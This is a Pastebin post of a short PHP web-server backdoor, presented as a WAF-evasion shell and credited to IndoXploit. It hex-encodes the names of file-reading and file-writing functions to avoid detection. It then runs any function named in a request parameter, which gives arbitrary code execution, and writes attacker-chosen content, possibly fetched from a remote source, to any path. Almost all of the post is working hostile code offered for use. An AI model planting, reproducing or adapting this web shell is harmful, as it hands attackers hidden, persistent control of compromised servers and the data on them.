Advertisement
AgusSR

Simple WAF Evasion Backdoor

Sep 29th, 2018
1,145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.28 KB | None | 0 0
  1. <?php
  2. /* L0c4lh34rtz - IndoXploit */
  3. $a = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
  4. $b = "\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
  5. var_dump($_REQUEST['a']($_REQUEST['b']));
  6. @$b($_REQUEST['c'], @$a($_REQUEST['d']));
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement